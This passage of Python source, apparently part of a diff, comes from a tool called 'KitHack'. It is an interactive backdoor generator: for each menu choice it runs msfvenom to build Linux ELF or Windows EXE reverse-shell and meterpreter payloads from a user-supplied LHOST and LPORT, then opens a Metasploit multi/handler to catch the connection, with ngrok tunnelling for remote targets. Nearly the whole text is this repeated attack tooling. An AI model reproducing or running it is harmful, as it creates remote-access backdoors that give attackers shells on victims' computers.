DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '10': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '11': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '12': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif sys == '02': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} windows/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[02]{1} windows/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[03]{1} windows/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[04]{1} windows/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[05]{1} windows/x64/powershell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[06]{1} windows/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[07]{1} windows/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[08]{1} windows/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[09]{1} windows/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[10]{1} windows/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[11]{1} windows/meterpreter/reverse_tcp_dns'.format(WHITE, YELLOW)) - print ('{0}[12]{1} windows/metsvc_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[13]{1} windows/powershell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[14]{1} windows/shell_reverse_tcp'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '03': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '04': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '05': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '06': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '07': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '08': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '09': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '10': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '11': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '12': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] 